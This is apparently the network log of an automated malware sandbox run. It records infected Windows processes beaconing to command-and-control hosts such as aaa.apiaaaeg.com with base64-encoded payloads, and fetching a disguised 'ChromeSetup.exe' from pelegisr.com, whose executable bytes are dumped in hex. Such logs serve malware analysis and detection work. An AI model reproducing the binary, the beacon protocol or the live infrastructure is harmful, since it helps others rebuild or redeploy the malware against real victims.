                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:25.943859100 CEST7673OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://umtcicl.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 216
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:26.058640003 CEST7674INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:26 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:26.084053040 CEST7674OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bfdgvxgb.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 171
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:26.200664997 CEST7675INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:26 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 69
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 87 aa e3 f8 17 5a f3 c5 64 e6 bb 3c 30 c8 bf a0 fa 14 ba aa 92 89 7a a6 72 8f 96 32 31 c8 7b 5f a7 1e 36 93 97 97 2b dc fb 14 82 b6 ca c1 3e f1
                                                                                                                                  Data Ascii: %S`Nh&WQY^Zd<0zr21{_6+>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  21192.168.2.54971345.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:21.886401892 CEST6862OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:22.043654919 CEST6863INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:21 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 55 58 68 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 78 47 54 6c 6b 7a 54 6c 5a 54 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6e 70 4e 4d 30 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 44 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qUXhMQ0p5WVc1a1gzTjBjaUk2SWxGTlkzTlZTZXlKemFXUWlPall6TnpNM0xDSjBhVzFsSWpveE5qWTJDSjk=0
                                                                                                                                  Oct 17, 2022 22:07:22.053661108 CEST6863OUTPOST /check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aae HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:22.053745031 CEST6864OUTData Raw: 57 56 64 57 62 46 70 58 56 6d 78 61 56 31 5a 73 53 57 70 76 5a 30 6c 71 52 58 6c 68 62 55 5a 77 59 6e 6c 4a 63 30 6c 44 53 6e 52 5a 56 30 31 70 54 32 6c 42 61 56 70 58 52 6d 74 4f 56 31 4a 70 54 30 52 53 61 30 31 58 55 6d 70 4f 61 6c 70 74 54 57
                                                                                                                                  Data Ascii: WVdWbFpXVmxaV1ZsSWpvZ0lqRXlhbUZwYnlJc0lDSnRZV01pT2lBaVpXRmtOV1JpT0RSa01XUmpOalptTWpZNE5qazRZamM0Wm1ReE5HSTFNRGdpTENBaWNHRjVTVzVtYnlJNklHWmhiSE5sTENBaWRXbGtJam9nSWpFeE1UTWlMQ0FpZFc1ZmNIZGtJam9nSWV5SmhZMk52ZFc1MFNXUWlPaUFpSWl3Z0ltTnZZMjlrWlNJNkl
                                                                                                                                  Oct 17, 2022 22:07:22.215936899 CEST6872INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:22 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  22192.168.2.54971745.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:23.757570982 CEST7315OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:23.942482948 CEST7324INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:23 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 55 58 70 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 74 56 4e 56 59 77 61 45 35 58 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6e 70 52 4d 30 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 44 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qUXpMQ0p5WVc1a1gzTjBjaUk2SWtVNVYwaE5XZXlKemFXUWlPall6TnpRM0xDSjBhVzFsSWpveE5qWTJDSjk=0
                                                                                                                                  Oct 17, 2022 22:07:23.951872110 CEST7324OUTPOST /check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf6030 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:23.951975107 CEST7325OUTData Raw: 57 56 64 57 62 46 70 58 56 6d 78 61 56 31 5a 73 53 57 70 76 5a 30 6c 71 52 58 68 68 62 55 5a 77 59 6e 6c 4a 63 30 6c 44 53 6e 52 5a 56 30 31 70 54 32 6c 42 61 56 70 58 52 6d 74 4f 56 31 4a 70 54 30 52 53 61 30 31 58 55 6d 70 4f 61 6c 70 74 54 57
                                                                                                                                  Data Ascii: WVdWbFpXVmxaV1ZsSWpvZ0lqRXhhbUZwYnlJc0lDSnRZV01pT2lBaVpXRmtOV1JpT0RSa01XUmpOalptTWpZNE5qazRZamM0Wm1ReE5HSTFNRGdpTENBaWNHRjVTVzVtYnlJNklHWmhiSE5sTENBaWRXbGtJam9nSWpFeE1UTWlMQ0FpZFc1ZmNIZGtJam9nSWV5SmhZMk52ZFc1MFNXUWlPaUFpSWl3Z0ltTnZZMjlrWlNJNkl
                                                                                                                                  Oct 17, 2022 22:07:24.122827053 CEST7338INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  23192.168.2.54972245.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:25.731281042 CEST7669OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:25.894103050 CEST7671INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 55 54 46 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 74 53 4d 31 59 77 62 45 39 53 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6e 70 56 4d 55 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 54 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qUTFMQ0p5WVc1a1gzTjBjaUk2SWtSM1YwbE9SZXlKemFXUWlPall6TnpVMUxDSjBhVzFsSWpveE5qWTJTSjk=0
                                                                                                                                  Oct 17, 2022 22:07:25.936383963 CEST7672OUTPOST /check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b2 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:25.936460972 CEST7673OUTData Raw: 57 56 64 57 62 46 70 58 56 6d 78 61 56 31 5a 73 53 57 70 76 5a 30 6c 71 52 58 64 68 62 55 5a 77 59 6e 6c 4a 63 30 6c 44 53 6e 52 5a 56 30 31 70 54 32 6c 42 61 56 70 58 52 6d 74 4f 56 31 4a 70 54 30 52 53 61 30 31 58 55 6d 70 4f 61 6c 70 74 54 57
                                                                                                                                  Data Ascii: WVdWbFpXVmxaV1ZsSWpvZ0lqRXdhbUZwYnlJc0lDSnRZV01pT2lBaVpXRmtOV1JpT0RSa01XUmpOalptTWpZNE5qazRZamM0Wm1ReE5HSTFNRGdpTENBaWNHRjVTVzVtYnlJNklHWmhiSE5sTENBaWRXbGtJam9nSWpFeE1UTWlMQ0FpZFc1ZmNIZGtJam9nSWV5SmhZMk52ZFc1MFNXUWlPaUFpSWl3Z0ltTnZZMjlrWlNJNkl
                                                                                                                                  Oct 17, 2022 22:07:26.108078957 CEST7675INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:26 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.549701162.0.217.254443C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.54970331.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.54970431.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.549707140.82.121.3443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.549708162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.54970931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.54971031.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549694185.220.204.62443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:06:34 UTC0OUTGET /upload/ChromeSetup.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: pelegisr.com
                                                                                                                                  2022-10-17 20:06:34 UTC0INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:33 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 19:00:03 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 223744
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-10-17 20:06:34 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 6c 9a 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 5e 17 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Tv:%:%:%%:%%:%A%:%;%:%%:%%:%%:%Rich:%PELla^
                                                                                                                                  2022-10-17 20:06:34 UTC8INData Raw: 73 68 2d 63 6f 6c 6f 6d 62 69 61 00 00 00 00 73 70 61 6e 69 73 68 2d 63 68 69 6c 65 00 00 00 73 70 61 6e 69 73 68 2d 62 6f 6c 69 76 69 61 00 73 70 61 6e 69 73 68 2d 61 72 67 65 6e 74 69 6e 61 00 00 00 70 6f 72 74 75 67 75 65 73 65 2d 62 72 61 7a 69 6c 69 61 6e 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 6e 79 6e 6f 72 73 6b 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 62 6f 6b 6d 61 6c 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 00 00 00 69 74 61 6c 69 61 6e 2d 73 77 69 73 73 00 00 00 69 72 69 73 68 2d 65 6e 67 6c 69 73 68 00 00 00 67 65 72 6d 61 6e 2d 73 77 69 73 73 00 00 00 00 67 65 72 6d 61 6e 2d 6c 75 78 65 6d 62 6f 75 72 67 00 00 00 67 65 72 6d 61 6e 2d 6c 69 63 68 74 65 6e 73 74 65 69 6e 00 67 65 72 6d 61 6e 2d 61 75 73 74 72 69 61 6e 00 66 72 65 6e 63 68 2d 73
                                                                                                                                  Data Ascii: sh-colombiaspanish-chilespanish-boliviaspanish-argentinaportuguese-braziliannorwegian-nynorsknorwegian-bokmalnorwegianitalian-swissirish-englishgerman-swissgerman-luxembourggerman-lichtensteingerman-austrianfrench-s
                                                                                                                                  2022-10-17 20:06:34 UTC15INData Raw: 75 c6 05 8e 28 43 00 6c c6 05 8d 28 43 00 61 c6 05 91 28 43 00 6f c6 05 95 28 43 00 74 c6 05 88 28 43 00 56 c6 05 94 28 43 00 63 c6 05 8f 28 43 00 50 c6 05 96 28 43 00 00 c6 05 8b 28 43 00 74 c6 05 92 28 43 00 74 c6 05 8a 28 43 00 72 c6 05 90 28 43 00 72 ff 15 68 10 40 00 8d 4d fc 51 6a 40 ff 35 50 c4 58 00 a3 84 28 43 00 ff 35 cc 6d 58 00 ff d0 5e c9 c3 c3 55 8b ec b8 04 1d 00 00 e8 aa 48 00 00 53 56 33 db 33 f6 81 fe cd 14 02 00 7d 0d 53 ff 15 1c 11 40 00 ff 15 18 11 40 00 81 fe 41 5e 9d 1e 7e 12 81 7d f8 f7 5c ad 00 74 09 81 7d bc 1c c4 d4 0a 75 09 46 81 fe a3 26 be 91 72 c8 33 f6 81 fe 20 04 00 00 75 0b b8 d6 38 00 00 01 05 50 c4 58 00 83 3d 50 c4 58 00 7a 75 08 53 53 ff 15 14 11 40 00 46 81 fe ce de 40 00 7c d3 ff 35 50 c4 58 00 53 ff 15 10 11 40 00
                                                                                                                                  Data Ascii: u(Cl(Ca(Co(Ct(CV(Cc(CP(C(Ct(Ct(Cr(Crh@MQj@5PX(C5mX^UHSV33}S@@A^~}\t}uF&r3 u8PX=PXzuSS@F@|5PXS@
                                                                                                                                  2022-10-17 20:06:34 UTC23INData Raw: 8b ce c7 06 90 14 40 00 e8 71 e8 ff ff 50 6a 00 6a 00 8b ce e8 fe fb ff ff 8b 4d f4 8b c6 5e 64 89 0d 00 00 00 00 c9 c2 04 00 55 8b ec 56 57 8b f1 e8 65 f3 ff ff 8b 7d 08 3b c7 73 05 e8 6b 25 00 00 39 7e 18 73 0d ff 76 14 8b ce 57 e8 bc fc ff ff eb 2c 80 7d 0c 00 74 1a 83 ff 10 73 15 8b 46 14 3b f8 73 02 8b c7 50 6a 01 8b ce e8 c7 fa ff ff eb 0c 85 ff 75 08 57 8b ce e8 88 f2 ff ff 33 c0 3b c7 1b c0 5f f7 d8 5e 5d c2 08 00 55 8b ec 51 ff 75 08 8b 01 83 65 fc 00 ff 50 10 8b 45 08 c9 c2 04 00 55 8b ec 51 ff 75 08 8b 01 83 65 fc 00 ff 50 14 8b 45 08 c9 c2 04 00 55 8b ec 53 8b 5d 08 57 83 c8 ff 8b f9 2b 47 14 3b c3 77 05 e8 d8 24 00 00 85 db 76 2b 56 8b 77 14 6a 00 03 f3 56 8b cf e8 41 ff ff ff 84 c0 74 16 ff 75 0c 8b cf 53 ff 77 14 e8 bc f4 ff ff 56 8b cf e8
                                                                                                                                  Data Ascii: @qPjjM^dUVWe};sk%9~svW,}tsF;sPjuW3;_^]UQuePEUQuePEUS]W+G;w$v+VwjVAtuSwV
                                                                                                                                  2022-10-17 20:06:34 UTC31INData Raw: 56 be 70 c4 58 00 56 e8 56 07 00 00 83 c6 18 81 fe d0 c4 58 00 59 7c ee 5e c3 8b ff 55 8b ec 8b 45 08 83 f8 04 56 8b f1 89 06 7d 0f 6b c0 18 05 70 c4 58 00 50 e8 38 07 00 00 59 8b c6 5e 5d c2 04 00 8b 01 83 f8 04 7d 0f 6b c0 18 05 70 c4 58 00 50 e8 2b 07 00 00 59 c3 8b ff 55 8b ec ff 75 08 e8 41 29 00 00 59 85 c0 74 06 5d e9 1a 14 00 00 5d c3 8b 49 04 e8 b1 ba ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 c3 8b ff 55 8b ec 56 8b f1 e8 de ff ff ff f6 45 08 01 74 07 56 e8 1c 09 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 8b 08 85 c9 74 11 e8 70 ba ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 5d c3 8b ff 55 8b ec 51 6a 00 8d 4d fc e8 40 ff ff ff 68 d8 c4 58 00 e8 c5 ff ff ff 83 25 d8 c4 58 00 00 59 8d 4d fc e8 4e ff ff ff c9 c3 a1 d8 c4 58 00 c3 8b ff 55
                                                                                                                                  Data Ascii: VpXVVXY|^UEV}kpXP8Y^]}kpXP+YUuA)Yt]]ItjUVEtVY^]UEtptj]UQjM@hX%XYMNXU
                                                                                                                                  2022-10-17 20:06:34 UTC39INData Raw: 8b ec 83 3d c0 c6 58 00 00 75 12 8b 45 08 8b 0d 70 19 43 00 0f b7 04 41 83 e0 08 5d c3 6a 00 ff 75 08 e8 85 ff ff ff 59 59 5d c3 8b ff 55 8b ec 83 ec 4c a1 48 17 43 00 33 c5 89 45 fc 53 33 db 56 8b 75 08 57 89 5d d4 89 5d e4 89 5d e0 89 5d d8 89 5d dc 89 75 b4 89 5d b8 39 5e 14 0f 84 16 03 00 00 8d 46 04 39 18 75 20 50 0f b7 46 30 68 04 10 00 00 50 8d 45 b4 53 50 e8 90 81 00 00 83 c4 14 85 c0 0f 85 c7 02 00 00 6a 04 e8 f3 06 00 00 6a 02 bf 80 01 00 00 57 89 45 d4 e8 28 07 00 00 6a 01 57 89 45 e4 e8 1d 07 00 00 6a 01 57 89 45 e0 e8 12 07 00 00 6a 01 68 01 01 00 00 89 45 d8 e8 03 07 00 00 83 c4 24 89 45 dc 39 5d d4 0f 84 7c 02 00 00 39 5d e4 0f 84 73 02 00 00 3b c3 0f 84 6b 02 00 00 39 5d e0 0f 84 62 02 00 00 39 5d d8 0f 84 59 02 00 00 8b 45 d4 89 18 33 c0
                                                                                                                                  Data Ascii: =XuEpCA]juYY]ULHC3ES3VuW]]]]]u]9^F9u PF0hPESPjjWE(jWEjWEjhE$E9]|9]s;k9]b9]YE3
